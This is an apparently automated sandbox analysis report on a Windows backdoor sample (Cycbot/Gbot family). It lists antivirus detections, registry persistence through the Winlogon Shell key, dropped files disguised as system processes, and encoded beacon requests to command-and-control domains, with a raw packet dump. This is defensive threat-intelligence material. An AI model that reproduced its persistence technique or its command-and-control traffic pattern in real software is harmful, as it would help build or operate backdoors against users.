Analysis Date | 2014-11-20 15:43:04 |
---|---|
MD5 | 8140dd3febfec1c819e28f6aa65e0455 |
SHA1 | 887562704cd3c7988be8e86ebeb4b5534b6ce8e7 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 8a2745d53daf5d2b7bad8c609b1c5702 sha1: dfd65c2fe5bced2c7c2213aa6d3626d85576d713 size: 114688 | |
Section | .tls md5: 0778bee6f0e10a72d16ee5a105c77f11 sha1: 94b78cb4c2bf806848e01465c0d52cef35546ed5 size: 1024 | |
Section | .data md5: 220e19c69d22b5ebb585f3a2e82e61b5 sha1: 55acd5c294dc3fb61d7584d1593d68066df7dc0e size: 67072 | |
Section | .reloc md5: a6272144641beacb67877be8b8a56489 sha1: 54796189c425f728012011c6f8fe8fbff6bd857e size: 1024 | |
Timestamp | 2005-11-29 07:48:07 | |
PEhash | 4752779d3fc50723abe0046462552b4130c79d68 | |
IMPhash | 00eb14c30da1e3b4a24f2c4f39ffc693 | |
AV | 360 Safe | Gen:Heur.Conjar.5 |
AV | Ad-Aware | Gen:Heur.Conjar.5 |
AV | Alwil (avast) | Cybota [Trj] |
AV | Arcabit (arcavir) | no_virus |
AV | Authentium | W32/Goolbot.K.gen!Eldorado |
AV | Avira (antivir) | TR/Crypt.XPACK.Gen8 |
AV | BullGuard | Gen:Heur.Conjar.5 |
AV | CA (E-Trust Ino) | Win32/FakeAlert.J!generic |
AV | CAT (quickheal) | Backdoor.Cycbot.B |
AV | ClamAV | Trojan.Gbot-453 |
AV | Dr. Web | BackDoor.Gbot.70 - infected, incurable |
AV | Emsisoft | Gen:Heur.Conjar.5 |
AV | Eset (nod32) | Win32/Kryptik.SRP |
AV | Fortinet | W32/Kryptik.SMY!tr.bdr |
AV | Frisk (f-prot) | W32/Goolbot.K.gen!Eldorado |
AV | F-Secure | Gen:Heur.Conjar.5 |
AV | Grisoft (avg) | Win32/Cryptor |
AV | Ikarus | Backdoor.Win32.Cycbot |
AV | K7 | Backdoor ( 003210941 ) |
AV | Kaspersky | Backdoor.Win32.Gbot.odl |
AV | MalwareBytes | Backdoor.Bot |
AV | Mcafee | BackDoor-EXI.gen.n |
AV | Microsoft Security Essentials | Backdoor:Win32/Cycbot.G |
AV | MicroWorld (escan) | Gen:Heur.Conjar.5 |
AV | Norman | Gen:Heur.Conjar.5 |
AV | Rising | Backdoor.Win32.Cycbot.a |
AV | Sophos | Mal/FakeAV-IS |
AV | Symantec | Backdoor.Cycbot!gen7 |
AV | Trend Micro | BKDR_CYCBOT.SME3 |
AV | VirusBlokAda (vba32) | BScope.DeadCryptor.01597 |
Runtime Details:
Process
↳ C:\malware.exe
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1 |
---|---|
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe |
Creates File | C:\Documents and Settings\Administrator\Application Data\dwm.exe |
Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Application Data\75DE.FFC |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe |
Creates Process | C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft |
Creates Process | C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp |
Creates Mutex | {45BCA615-C82A-4152-8857-BCC626AE4C8D} |
Creates Mutex | {5A92A751-F926-4BB9-872E-BEC4A4CD571F} |
Creates Mutex | WininetConnectionMutex |
Creates Mutex | c:!documents and settings!administrator!cookies! |
Creates Mutex | {61B98B86-5F44-42b3-BCA1-33904B067B81} |
Creates Mutex | {0ECE180F-6E9E-4FA6-A154-6876D9DB8906} |
Creates Mutex | c:!documents and settings!administrator!local settings!history!history.ie5! |
Creates Mutex | {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78} |
Creates Mutex | {B37C48AF-B05C-4520-8B38-2FE181D5DC78} |
Creates Mutex | c:!documents and settings!administrator!local settings!temporary internet files!content.ie5! |
Creates Mutex | {35BCA615-C82A-4152-8857-BCC626AE4C8D} |
Winsock DNS | 127.0.0.1 |
Winsock DNS | yourvideoportal.com |
Winsock DNS | onlinemediaresource.com |
Winsock DNS | psfk.com |
Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe |
---|
Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process | C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe |
---|
Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Network Details:
DNS | psfk.com Type: A 72.10.50.52 |
---|---|
DNS | onlinemediaresource.com Type: A 54.208.78.194 |
DNS | zonedg.com Type: A 141.8.225.80 |
DNS | zonedg.com Type: A 141.8.225.80 |
DNS | yourvideoportal.com Type: A 54.209.168.250 |
HTTP GET | http://psfk.com/img/icons/twitter.png?v16=12&tq=gJ4WK%2FSUh%2FTNhRMw9YLJ%2BMSTUivqg4b0zZpEfqHXarVJ%2BQhhAAQ%3D User-Agent: mozilla/2.0 |
HTTP GET | http://onlinemediaresource.com/blog/images/3521.jpg?v55=6&tq=gKZEtzyMv5rJqxG1J42pzMffBvUr0%2BjbwvgS917V65rJqlLfgPiWW1cg User-Agent: mozilla/2.0 |
HTTP POST | http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D User-Agent: mozilla/2.0 |
HTTP POST | http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNwlKv975Xlm5G User-Agent: mozilla/2.0 |
HTTP GET | http://yourvideoportal.com/blog/images/3521.jpg?v13=64&tq=gKZEtzyMv5rJqxG1J42pzMffBvUr0%2BjbwvgS917X65rJqlLfgPiWW1cg User-Agent: mozilla/2.0 |
HTTP POST | http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D User-Agent: mozilla/2.0 |
HTTP POST | http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNxlKv975Xlm5G User-Agent: mozilla/2.0 |
HTTP POST | http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G User-Agent: mozilla/2.0 |
Flows TCP | 192.168.1.1:1031 ➝ 72.10.50.52:80 |
Flows TCP | 192.168.1.1:1032 ➝ 54.208.78.194:80 |
Flows TCP | 192.168.1.1:1034 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1035 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1036 ➝ 54.209.168.250:80 |
Flows TCP | 192.168.1.1:1037 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1038 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1039 ➝ 141.8.225.80:80 |
Raw Pcap
```text
0x00000000 (00000) 47455420 2f696d67 2f69636f 6e732f74 GET /img/icons/t
0x00000010 (00016) 77697474 65722e70 6e673f76 31363d31 witter.png?v16=1
0x00000020 (00032) 32267471 3d674a34 574b2532 46535568 2&tq=gJ4WK%2FSUh
0x00000030 (00048) 25324654 4e68524d 7739594c 4a253242 %2FTNhRMw9YLJ%2B
0x00000040 (00064) 4d535455 69767167 3462307a 5a704566 MSTUivqg4b0zZpEf
0x00000050 (00080) 71485861 72564a25 32425168 68414151 qHXarVJ%2BQhhAAQ
0x00000060 (00096) 25334420 48545450 2f312e30 0d0a436f %3D HTTP/1.0..Co
0x00000070 (00112) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close.
0x00000080 (00128) 0a486f73 743a2070 73666b2e 636f6d0d .Host: psfk.com.
0x00000090 (00144) 0a416363 6570743a 202a2f2a 0d0a5573 .Accept: */*..Us
0x000000a0 (00160) 65722d41 67656e74 3a206d6f 7a696c6c er-Agent: mozill
0x000000b0 (00176) 612f322e 300d0a0d 0a                a/2.0....

0x00000000 (00000) 47455420 2f626c6f 672f696d 61676573 GET /blog/images
0x00000010 (00016) 2f333532 312e6a70 673f7635 353d3626 /3521.jpg?v55=6&
0x00000020 (00032) 74713d67 4b5a4574 7a794d76 35724a71 tq=gKZEtzyMv5rJq
0x00000030 (00048) 7847314a 3432707a 4d666642 76557230 xG1J42pzMffBvUr0
0x00000040 (00064) 2532426a 62777667 53393137 56363572 %2BjbwvgS917V65r
0x00000050 (00080) 4a716c4c 66675069 57573163 67204854 JqlLfgPiWW1cg HT
0x00000060 (00096) 54502f31 2e300d0a 436f6e6e 65637469 TP/1.0..Connecti
0x00000070 (00112) 6f6e3a20 636c6f73 650d0a48 6f73743a on: close..Host:
0x00000080 (00128) 206f6e6c 696e656d 65646961 7265736f  onlinemediareso
0x00000090 (00144) 75726365 2e636f6d 0d0a4163 63657074 urce.com..Accept
0x000000a0 (00160) 3a202a2f 2a0d0a55 7365722d 4167656e : */*..User-Agen
0x000000b0 (00176) 743a206d 6f7a696c 6c612f32 2e300d0a t: mozilla/2.0..
0x000000c0 (00192) 0d0a                                ..

0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html
0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2
0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf
0x00000030 (00048) 316c5825 32425039 68253242 49307344 1lX%2BP9h%2BI0sD
0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2
0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb
0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU
0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv
0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC
0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp
0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA
0x000000b0 (00176) 4f684c67 6a683838 42537225 32466525 OhLgjh88BSr%2Fe%
0x000000c0 (00192) 32425635 5a755267 25334425 33442048 2BV5ZuRg%3D%3D H
0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a207a TTP/1.1..Host: z
0x000000e0 (00224) 6f6e6564 672e636f 6d0d0a55 7365722d onedg.com..User-
0x000000f0 (00240) 4167656e 743a206d 6f7a696c 6c612f32 Agent: mozilla/2
0x00000100 (00256) 2e300d0a 436f6e74 656e742d 4c656e67 .0..Content-Leng
0x00000110 (00272) 74683a20 300d0a43 6f6e6e65 6374696f th: 0..Connectio
0x00000120 (00288) 6e3a2063 6c6f7365 0d0a0d0a          n: close....

0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html
0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2
0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf
0x00000030 (00048) 316c5825 32425039 68253242 49307344 1lX%2BP9h%2BI0sD
0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2
0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb
0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU
0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv
0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC
0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp
0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA
0x000000b0 (00176) 4f684c67 6a683873 47253242 636f4a73 OhLgjh8sG%2BcoJs
0x000000c0 (00192) 58253242 534e776c 4b763937 35586c6d X%2BSNwlKv975Xlm
0x000000d0 (00208) 35472048 5454502f 312e310d 0a486f73 5G HTTP/1.1..Hos
0x000000e0 (00224) 743a207a 6f6e6564 672e636f 6d0d0a55 t: zonedg.com..U
0x000000f0 (00240) 7365722d 4167656e 743a206d 6f7a696c ser-Agent: mozil
0x00000100 (00256) 6c612f32 2e300d0a 436f6e74 656e742d la/2.0..Content-
0x00000110 (00272) 4c656e67 74683a20 300d0a43 6f6e6e65 Length: 0..Conne
0x00000120 (00288) 6374696f 6e3a2063 6c6f7365 0d0a0d0a ction: close....
0x00000130 (00304) 2020203c 703e4e6f 20737563 68206669    <p>No such fi
0x00000140 (00320) 6c65206f 72206469 72656374 6f72792e le or directory.
0x00000150 (00336) 3c2f703e 0a20203c 6872202f 3e0a2020 </p>.  <hr />.
0x00000160 (00352) 3c616464 72657373 3e4d6963 726f736f <address>Microso
0x00000170 (00368) 66742d49 49532f37 2e303c2f 61646472 ft-IIS/7.0</addr
0x00000180 (00384) 6573733e 0a20203c 2f626f64 793e0a3c ess>.  </body>.<
0x00000190 (00400) 2f68746d 6c3e0a                     /html>.

0x00000000 (00000) 47455420 2f626c6f 672f696d 61676573 GET /blog/images
0x00000010 (00016) 2f333532 312e6a70 673f7631 333d3634 /3521.jpg?v13=64
0x00000020 (00032) 2674713d 674b5a45 747a794d 7635724a &tq=gKZEtzyMv5rJ
0x00000030 (00048) 71784731 4a343270 7a4d6666 42765572 qxG1J42pzMffBvUr
0x00000040 (00064) 30253242 6a627776 67533931 37583635 0%2BjbwvgS917X65
0x00000050 (00080) 724a716c 4c666750 69575731 63672048 rJqlLfgPiWW1cg H
0x00000060 (00096) 5454502f 312e300d 0a436f6e 6e656374 TTP/1.0..Connect
0x00000070 (00112) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host
0x00000080 (00128) 3a20796f 75727669 64656f70 6f727461 : yourvideoporta
0x00000090 (00144) 6c2e636f 6d0d0a41 63636570 743a202a l.com..Accept: *
0x000000a0 (00160) 2f2a0d0a 55736572 2d416765 6e743a20 /*..User-Agent:
0x000000b0 (00176) 6d6f7a69 6c6c612f 322e300d 0a0d0a20 mozilla/2.0....
0x000000c0 (00192) 2020203c 2f746974 6c653e0a 20203c2f    </title>.  </
0x000000d0 (00208) 68656164 3e0a2020 3c626f64 793e0a20 head>.  <body>.
0x000000e0 (00224) 2020203c 68333e54 68697320 69732074    <h3>This is t
0x000000f0 (00240) 68652072 65616c2d 6d6f6465 20746573 he real-mode tes
0x00000100 (00256) 74207061 67652e2e 2e3c2f68 333e0a09 t page...</h3>..
0x00000110 (00272) 093c696d 67207372 633d226c 6f676f2e .<img src="logo.
0x00000120 (00288) 67696622 3e0a2020 3c2f626f 64793e0a gif">.  </body>.
0x00000130 (00304) 3c2f6874 6d6c3e0a                   </html>.

0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html
0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2
0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf
0x00000030 (00048) 316c5825 32425039 68253242 49307344 1lX%2BP9h%2BI0sD
0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2
0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb
0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU
0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv
0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC
0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp
0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA
0x000000b0 (00176) 4f684c67 6a683838 42537225 32466525 OhLgjh88BSr%2Fe%
0x000000c0 (00192) 32425635 5a755267 25334425 33442048 2BV5ZuRg%3D%3D H
0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a207a TTP/1.1..Host: z
0x000000e0 (00224) 6f6e6564 672e636f 6d0d0a55 7365722d onedg.com..User-
0x000000f0 (00240) 4167656e 743a206d 6f7a696c 6c612f32 Agent: mozilla/2
0x00000100 (00256) 2e300d0a 436f6e74 656e742d 4c656e67 .0..Content-Leng
0x00000110 (00272) 74683a20 300d0a43 6f6e6e65 6374696f th: 0..Connectio
0x00000120 (00288) 6e3a2063 6c6f7365 0d0a0d0a 64793e0a n: close....dy>.
0x00000130 (00304) 3c2f6874 6d6c3e0a                   </html>.

0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html
0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2
0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf
0x00000030 (00048) 316c5825 32425039 68253242 49307344 1lX%2BP9h%2BI0sD
0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2
0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb
0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU
0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv
0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC
0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp
0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA
0x000000b0 (00176) 4f684c67 6a683873 47253242 636f4a75 OhLgjh8sG%2BcoJu
0x000000c0 (00192) 58253242 534e786c 4b763937 35586c6d X%2BSNxlKv975Xlm
0x000000d0 (00208) 35472048 5454502f 312e310d 0a486f73 5G HTTP/1.1..Hos
0x000000e0 (00224) 743a207a 6f6e6564 672e636f 6d0d0a55 t: zonedg.com..U
0x000000f0 (00240) 7365722d 4167656e 743a206d 6f7a696c ser-Agent: mozil
0x00000100 (00256) 6c612f32 2e300d0a 436f6e74 656e742d la/2.0..Content-
0x00000110 (00272) 4c656e67 74683a20 300d0a43 6f6e6e65 Length: 0..Conne
0x00000120 (00288) 6374696f 6e3a2063 6c6f7365 0d0a0d0a ction: close....
0x00000130 (00304) 2020203c 703e4e6f 20737563 68206669    <p>No such fi
0x00000140 (00320) 6c65206f 72206469 72656374 6f72792e le or directory.
0x00000150 (00336) 3c2f703e 0a20203c 6872202f 3e0a2020 </p>.  <hr />.
0x00000160 (00352) 3c616464 72657373 3e4d6963 726f736f <address>Microso
0x00000170 (00368) 66742d49 49532f37 2e303c2f 61646472 ft-IIS/7.0</addr
0x00000180 (00384) 6573733e 0a20203c 2f626f64 793e0a3c ess>.  </body>.<
0x00000190 (00400) 2f68746d 6c3e0a                     /html>.

0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html
0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2
0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf
0x00000030 (00048) 316c5825 32425039 68253242 49307344 1lX%2BP9h%2BI0sD
0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2
0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb
0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU
0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv
0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC
0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp
0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA
0x000000b0 (00176) 4f684c67 6a682532 46383225 3242636f OhLgjh%2F82%2Bco
0x000000c0 (00192) 4a745825 3242534e 78723579 676d3143 JtX%2BSNxr5ygm1C
0x000000d0 (00208) 346c4b76 39373558 6c6d3547 20485454 4lKv975Xlm5G HTT
0x000000e0 (00224) 502f312e 310d0a48 6f73743a 207a6f6e P/1.1..Host: zon
0x000000f0 (00240) 6564672e 636f6d0d 0a557365 722d4167 edg.com..User-Ag
0x00000100 (00256) 656e743a 206d6f7a 696c6c61 2f322e30 ent: mozilla/2.0
0x00000110 (00272) 0d0a436f 6e74656e 742d4c65 6e677468 ..Content-Length
0x00000120 (00288) 3a20300d 0a436f6e 6e656374 696f6e3a : 0..Connection:
0x00000130 (00304) 20636c6f 73650d0a 0d0a                close....
```
Strings
. . . 080904b0 1.0.0.1 1117 FileVersion &find &Find any Alt+F PrivateBuild ProductVersion StringFileInfo Translation VarFileInfo VS_VERSION_INFO ``````````````` `^*``$ ^^^^^^^ ^^^^^^^^^^^^_______ ~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~ ,,,,,,,,,,,,,,,,,,,,,,,, ;;;;;;;;;;;;;;;; :::::: :::::::: ::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::: !!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!! ????????????????????? ????????????????????????????????????????????? //////////////////////////////////////////////// '''''''''' """"""""""""""""""""""""""""""""""""" [[[[[[[[[[[[[[[[[[[ [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[ ]'{]{^ {{{{{{{{{{{{ }}}}}}}}}}}}} }}}}}}}}}}}}}}} $$$$$$$$$ ******************** & `,`@. & & @ &&&&&& ######################## ##########################= ++++++++ 0000000000000000000000000000000000 0000jjjjjjjj &,00PG@ ",_0aP 0OvYjJ6 0T0v6D6 0YO^s\ @1%^^ 1111111111111111111 1*H2N@ 2}20R ` $@ 29^E 2DL~fE [2hHrZ0 ``2}J! 333333333333333333ddddddddddddddddddddddddddddddddddddddddddddddff 333333333344IIIIIIIIIII 3~"`@Cq *'3\`m 3_^n^x -3YlBe `[4;~>D 4GdeLZ$ 4jZI& [4lV-s_ 4pV7Kr 5,_0bg 55555555555nnnnnnnnnn 55a8)Y/ * 55yV6( 57s1)) 58o$Q[ 5j?&` R 5"@n]/ 5+rR} `` $6h+|D` 6-P4gZ @$<6[y `@7&` _^7QfI , @}8' 8$@` < ]8'5V ((((((((((((((((((((888888 888888888 @, 8C. $ [8~D $@@9], 99999999999999 9-a3I)J 9bi0z5 9D/uto 9\s m\ A2X7y, ~A87}fw +a9f]8 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ac2z`C8 ADVAPI32.dll a^fg( `A* `qF avFt{6 A!`w*8 aY]a#t ` b179 B2Q$0Z `B|9<g `BDCa" b"{ob7 ,@@B>P `#=bR bwh.dll bYBlUb bz{#N% C@'&@ "C1}{i ccccccccccccccccccccccccccccccccccccccchhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh Cf@@= !C{\Me CreateProcessA *cy3B} @.data {*@@Db ,,DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm $`@{Dk @d>=mE Dq^W5H dT&` ` DTW^'8 @>E%a~42 E'g=A; eI(!&p58s[ (@@Elr! EnumResourceNamesW ? 
e`Nz E|rBH' <E/u, e!v2|5G~tI~7C e'W>-; Ex%,o3 Ey/ `` ey;OR8 *f7;)[+ F{BOiq FFFFFF fffffffffffff ffffffffffffff FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF ."f/F%n/ \Fnj)*I fO4iA3w F !sb! >*@ fV @F<X<d_. g 1#rI /gdTX GetSystemTimeAsFileTime gOb~HG33 G~S>")I .G/sNw Gv5:8 GW|$ ` ^h2r,V h>^4ZMrA h|9&@ Hf2Wbh$ `@hG_O HhF;+" hhhhhhhhhhhh @hpG. @ . `h_QW h*`@TU< H']~UT `i, /i=a1a] iaxs[)x7 Ibxv6vl idJNGFx -#IHX*-0[ iiiiiiiiiiiii iiiiiiiiiiiiiiiiiii 'ij>hZ- I N94 InterlockedExchange iOZ, ` ? @i#W J3g8{t j3M\8u ^=J8=& jjj JJJJJJJJJJJJJJ JKh=P4 jO}FX+ jrs>uS J"*VtB+r+ JxGm ` jz6H*` ` K^'>= K2:dP*Rh `K7H%# ].k|99 ?Kdk2' KERNEL32.dll kfbf&ah kM9*SO kQt@_EL ~KS28; KSoN.% @ K}u@ /]l$`@" L' @`@ L0shxq ~L1=r4 \L"!24(cf`n $`@lbZ Limgs_r lKI"`@]F llllllllllllllleeeeeeee LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL llllllllllloooooooo %.L<nPl_ LocalAlloc lstrlenA |L!T^%@ lX3 \!n M1o;Ih M4K'<Q5< M:fCms [Mf*sE m$H-`W m ``jh? mmmmmmmmmmmfffffffffffffffffffffffffffffffffffffffffffu mmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmm MP[\iH' MPRAPI.dll MprConfigGetFriendlyName MprConfigServerConnect MprConfigServerDisconnect msi9ke#:OM4} i MultiByteToWideChar /M=v5q (@@mwa2 'mY;oA MyRZbr N:&`@& NdrFixedArrayFree n$@`Ft+ nnnnnnnnnnn n-/PvWr nSP01, N.zAQy O57>%0 o_Cyi1 +Od@l-r7B -o:l}p o&` m] @@/o+O oooooooooooooooooooooooo OpenWaitableTimerW `oT`B o%UQSfs `?ov,-8 ,@ P%/ PathFileExistsW @@;p`D P+F+3PP pidTJq PPPPPPPPP PPPPPPPPPPPPPPPPP PPPPPPPPPPPPPPPPPPPPPPPPPPPP PzT'* q^CQo2> qfsRfS Q[h}L ``#Q l `@Q~nH `@QOYn {q[q?= QQ5Qkj qqqqqqqqqq qQuBsD q R:a} Q[XTn. 
r4['^0{ (R:6GrS< r8= ` G RaiseException rB*@@" RegCloseKey RegCreateKeyExA RegDeleteKeyA RegEnumKeyExA RegOpenKeyA RegOpenKeyExA RegQueryValueExA RegSetValueExA .reloc R*&FbvS R%$*k[4 {R^:k6j RPCRT4.dll Rqdf'r rrrrrr``````` RRRRRRRRR RRRRRRRRRRRRRRRRlllllllllllllllllllllllllllllllllllllll @RS `B &r%SR1 RS#W{" s+ @#/ /sb, @ s~`BMov sC'"@ `SdC*@`j SHLWAPI.dll S I9K9U @`sJHMg sJobx7 +sMtY4g [spSR SSSSSSS sssssssssssCCCCCCC SSSSSSSSSSSSSSSSSSS t2X^n- T3} 1W Tb]></ !This program cannot be run in DOS mode. tI@KFe ` =Tj-G *to2iP/~Ij tttttt TTTTTTTTTTTTTTTTT55 TTTTTTTTTTTTTTTTTTT TTTTTTTTTTTTTTTTTTTTTTTTTT TTTTTTTTTTTTTTTTTTTTTTTTTTTT tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt |.@@U u!]+8X4 uAVZ{15x Ub\Y2\ "@ UD9 ;uH/3/ uj()5QE \U%'nv UuidCreate %uzAQ_ V`9FcT( VA")GX ?v" @hL VirtualAllocEx ~VJdhZ+Ib VjUC/h" `@vJZQ :?\`/Vm vN;DSqCy :Vqqr~ Vr8t;N ]]]]]]]]]]]]]VVVVVVVVVVV @>VxS0 ; `@W$@ W|8P[q W9'D'3 %WbZQH ~&wH#@ WideCharToMultiByte wj}BwA `wLAu(BT) )/WmQ"` WM|Uay WTE(@` wvKiXc? WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW X; !,) 